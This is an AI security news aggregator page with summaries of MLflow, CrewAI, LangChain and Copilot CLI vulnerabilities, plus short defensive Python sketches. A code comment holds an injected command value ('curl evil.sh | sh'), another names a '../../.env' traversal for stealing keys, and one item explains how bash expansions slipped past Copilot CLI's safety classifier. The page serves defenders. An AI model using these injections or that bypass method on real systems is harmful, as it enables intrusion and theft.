aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. This site, built by an Information Systems Security researcher, helps security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Total tracked: 2,669 | Last 24 hours: 17 | Last 7 days: 162
Daily Briefing: Monday, March 30, 2026

- Anthropic's Leaked "Mythos" Model Raises Cybersecurity Concerns: An accidental configuration leak revealed Anthropic's unreleased Mythos model, which has advanced reasoning and coding abilities including recursive self-fixing (autonomously finding and patching its own bugs). The model's improved capability to find and exploit software vulnerabilities could enable more sophisticated cyberattacks, prompting Anthropic to plan a cautious rollout targeting enterprise security teams first.

- Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where an attacker inserts malicious commands into input that gets executed) in its model serving code when deploying models with `env_manager=LOCAL`. The flaw reads dependency information from `python_env.yaml` and executes it in a shell without validation, allowing arbitrary command execution on deployment systems. (CVE-2025-15379, critical severity)
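The MLflow flaw is a textbook instance of a generic pattern: untrusted strings from a config file are spliced into a shell command line. A minimal Python sketch of the difference between the vulnerable and the safer construction (helper names are hypothetical, not MLflow's actual code):

```python
# CVE-2025-15379 class of bug: dependency strings read from an untrusted
# python_env.yaml are interpolated into a shell command line, so a value
# like "requests; curl evil.sh | sh" injects extra commands.
# Hypothetical helpers for illustration, not MLflow's actual code.

def build_install_shell_line(dependency: str) -> str:
    # VULNERABLE if executed with shell=True: shell metacharacters
    # (";", "|", "$()") inside `dependency` start new commands.
    return f"pip install {dependency}"

def build_install_argv(dependency: str) -> list[str]:
    # SAFER: an argument vector is never re-parsed by a shell, and the
    # "--" separator stops pip from treating the value as an option.
    return ["pip", "install", "--", dependency]
```

Passing an argument vector keeps the dependency string as literal data even when it contains shell metacharacters; validating it against a package-name grammar before use adds a second layer.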

- Multiple High-Severity Vulnerabilities Found in CrewAI: CrewAI has several serious security flaws, including two that enable RCE (remote code execution, where attackers run commands on systems they don't control) when Docker containerization fails and the system falls back to less secure sandbox settings. Additional vulnerabilities allow arbitrary file reading and SSRF (server-side request forgery, tricking a server into making unwanted requests) through improper validation in RAG search tools. (CVE-2026-2287, CVE-2026-2275, CVE-2026-2285, CVE-2026-2286)

- LangChain Path Traversal Adds to AI Pipeline Security Woes: LangChain and LangGraph have critical flaws allowing attackers to steal sensitive data like API keys through improper input handling, including a new path traversal bug (CVE-2026-34070, CVSS 7.5) that lets attackers read arbitrary files. Maintainers have released fixes that should be applied immediately.

Critical This Week (5 issues)

- CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_… (NVD/CVE Database, Mar 30, 2026)

Latest Intel (page 54/267)

01

Only 30 minutes per quarter on cyber risk: Why CISO-board conversations are falling short

security, policy
Mar 6, 2026

CISOs (chief information security officers, the executives responsible for an organization's cybersecurity) and corporate boards spend only about 30 minutes per quarter discussing cyber risk, and these conversations lack depth and strategic engagement. The report found that while 95% of CISOs report to their boards regularly, most discussions are brief check-ins rather than collaborative problem-solving, and boards want better insight into emerging threats like AI-driven attacks.

CSO Online
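The LangChain path traversal flaw (CVE-2026-34070) covered in today's briefing belongs to a well-understood class: a caller-supplied filename containing `../` segments resolves outside the intended directory. A minimal defensive sketch (hypothetical helper, not LangChain's actual fix):

```python
from pathlib import Path

# Path traversal, the class of bug behind CVE-2026-34070: a caller-
# supplied name like "../../.env" resolves outside the intended
# directory and exposes secrets such as API keys.
# Hypothetical helper for illustration, not LangChain's actual fix.

def safe_read(base_dir: str, user_path: str) -> bytes:
    base = Path(base_dir).resolve()
    target = (base / user_path).resolve()
    # resolve() collapses ".." segments and symlinks, so the containment
    # check below sees the real destination.
    if not target.is_relative_to(base):  # Python 3.9+
        raise ValueError("path escapes the allowed directory")
    return target.read_bytes()
```

Resolving before checking containment is the important part; a naive string prefix check on the raw input misses both `..` tricks and symlinks.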
02

Anthropic and the Pentagon

policy, industry
Mar 6, 2026

Anthropic and other major AI companies are competing in a market where their AI models perform at similar levels, with only small quality improvements appearing every few months. In this environment, Anthropic is trying to stand out by branding itself as the most ethical and trustworthy AI provider, a position that carries weight with both individual users and large organizations.

Simon Willison's Weblog
03

Anthropic and the Pentagon

policy, industry
Mar 6, 2026

Anthropic lost a US Department of Defense contract after refusing to let the Pentagon use its AI models for mass surveillance or fully autonomous weapons (systems that make kill decisions without human input), while OpenAI secured the contract by agreeing to provide classified government systems with AI. The article argues this outcome may benefit Anthropic by reinforcing its brand as a trustworthy, ethical AI provider in a competitive market where different AI models perform similarly.

Schneier on Security
04

AI as tradecraft: How threat actors operationalize AI

security, safety
Mar 6, 2026

Threat actors are using AI and language models as operational tools to speed up cyberattacks across all stages, from creating phishing emails to generating malware code, while human attackers maintain control over targeting and deployment decisions. Emerging experiments with agentic AI (where models make iterative decisions with minimal human input) suggest attackers may develop more adaptive and harder-to-detect tactics in the future. Microsoft reports disrupting thousands of fraudulent accounts and partnering with industry to counter AI-enabled threats through technical protections and responsible AI practices.

Microsoft Security Blog
05

GHSA-g8r9-g2v8-jv6f: GitHub Copilot CLI Dangerous Shell Expansion Patterns Enable Arbitrary Code Execution

security
Mar 6, 2026

GitHub Copilot CLI had a vulnerability where attackers could execute arbitrary code by hiding dangerous commands inside bash parameter expansion patterns (special syntax for manipulating variables). The safety system that checks whether commands are safe would incorrectly classify these hidden commands as harmless, allowing them to run without user approval.

Fix: The patch adds two layers of defense: (1) the safety assessment now detects dangerous operators like @P, =, :=, and ! within ${...} expansions and reclassifies commands containing them from read-only to write-capable, so they require user approval; (2) commands with dangerous expansion patterns are unconditionally blocked at the execution layer regardless of permission mode. Update to GitHub Copilot CLI version 0.0.423 or later.

GitHub Advisory Database
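The advisory's first layer, spotting risky operators inside `${...}`, can be approximated with a pattern check. A hypothetical sketch (the regex and function are illustrative, not Copilot CLI's actual classifier):

```python
import re

# Bash parameter expansions can do more than substitute a value:
# ${var@P} expands the value as a prompt string (running embedded
# $(...) substitutions), ${var=x} and ${var:=x} assign to var, and
# ${!var} performs indirect expansion. A classifier that treats every
# ${...} as read-only would wave these through.
# Illustrative sketch only, not Copilot CLI's actual classifier.
DANGEROUS_EXPANSION = re.compile(
    r"\$\{[^}]*"        # inside a ${...} expansion
    r"(?:@\w"           # transformation operators such as @P
    r"|:?=[^}]*"        # = and := assign a value to the parameter
    r"|![^}]*)"         # ! triggers indirect expansion
    r"\}"
)

def needs_approval(command: str) -> bool:
    """Flag commands whose expansions could execute code or mutate
    state, so they require explicit user approval."""
    return bool(DANGEROUS_EXPANSION.search(command))
```

Note this mirrors only the detection step; the advisory's second layer (unconditional blocking at execution time) matters precisely because any single pattern list can be bypassed.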
06

Weasel Words: OpenAI's Pentagon Deal Won't Stop AI-Powered Surveillance

policy, safety
Mar 6, 2026

OpenAI signed a deal with the U.S. Department of Defense to provide AI tools after rival Anthropic refused, sparking criticism and a 300% spike in ChatGPT uninstalls. The company added contract language stating the AI won't be used for domestic surveillance of U.S. citizens, but critics argue the agreement contains vague 'weasel words' (deliberately ambiguous phrases that allow one side to avoid accountability) like 'intentionally,' 'deliberately,' and 'unconstrained' that the government can interpret loosely to justify mass surveillance anyway.

EFF Deeplinks Blog
07

Fake Claude Code install guides push infostealers in InstallFix attacks

security
Mar 6, 2026

Attackers are using InstallFix, a social engineering technique, to distribute the Amatera Stealer malware through fake installation pages for Claude Code that closely mimic the legitimate site. These cloned pages contain malicious install commands designed to trick users into running code that downloads the malware, and are promoted via malvertising (fake ads in search results) on Google Ads.

Fix: Users looking for Claude Code should get installation instructions only from official websites, skip or block promoted Google Search results, and bookmark official software download portals rather than searching for them each time.

BleepingComputer
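Beyond sourcing installers from official sites, checking a download against the vendor's published checksum catches a swapped binary. A small sketch (hypothetical helper, assuming the vendor publishes a SHA-256 for the installer):

```python
import hashlib

# InstallFix lures rely on victims running whatever a cloned page tells
# them to. When a vendor publishes a SHA-256 for its installer, checking
# the downloaded file against it catches a swapped binary.
# Hypothetical helper for illustration.

def installer_matches(path: str, published_sha256: str) -> bool:
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        # Hash in chunks so large installers don't load into memory.
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest() == published_sha256.strip().lower()
```

This only helps if the expected checksum comes from the official site over HTTPS; a checksum copied from the same cloned page proves nothing.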
08

Cyberattack on Mexico's Gov't Agencies Highlights AI Threat

security
Mar 6, 2026

Cyberattackers used popular AI chatbots, specifically Anthropic's Claude and OpenAI's ChatGPT, along with a detailed instruction set (called a prompt), to break into Mexican government agencies and steal citizens' personal data. This incident demonstrates how AI tools can be misused by attackers to carry out coordinated cybercrimes against government systems.

Dark Reading
09

Targeted advertising is also targeting malware

security
Mar 6, 2026

Online ads are becoming a major way to spread malware (malicious software) into organizations, with malvertising (malware delivered through ads) now surpassing email and direct hacking as the top delivery method. AI is making this worse by enabling attackers to create adaptive malware that changes its behavior based on a user's location, browser, or device, allowing millions of infected ads to spread across websites in seconds.

CSO Online
10

The Download: 10 things that matter in AI, plus Anthropic’s plan to sue the Pentagon

policy, industry
Mar 6, 2026

This article covers recent AI industry news, including Anthropic's plan to sue the Pentagon over a software ban, revelations that the Pentagon has secretly tested OpenAI models for years, and various developments around AI in smart homes, energy consumption, and military applications. The piece is primarily a news roundup highlighting 10 significant AI-related stories rather than analyzing a specific technical problem or vulnerability.

MIT Technology Review
Critical This Week (continued)

- CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis… (NVD/CVE Database, Mar 27, 2026)
- Attackers exploit critical Langflow RCE within hours as CISA sounds alarm (CSO Online, Mar 27, 2026)
- CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability (CISA Known Exploited Vulnerabilities, Mar 26, 2026)
- CISA: New Langflow flaw actively exploited to hijack AI workflows (BleepingComputer, Mar 26, 2026)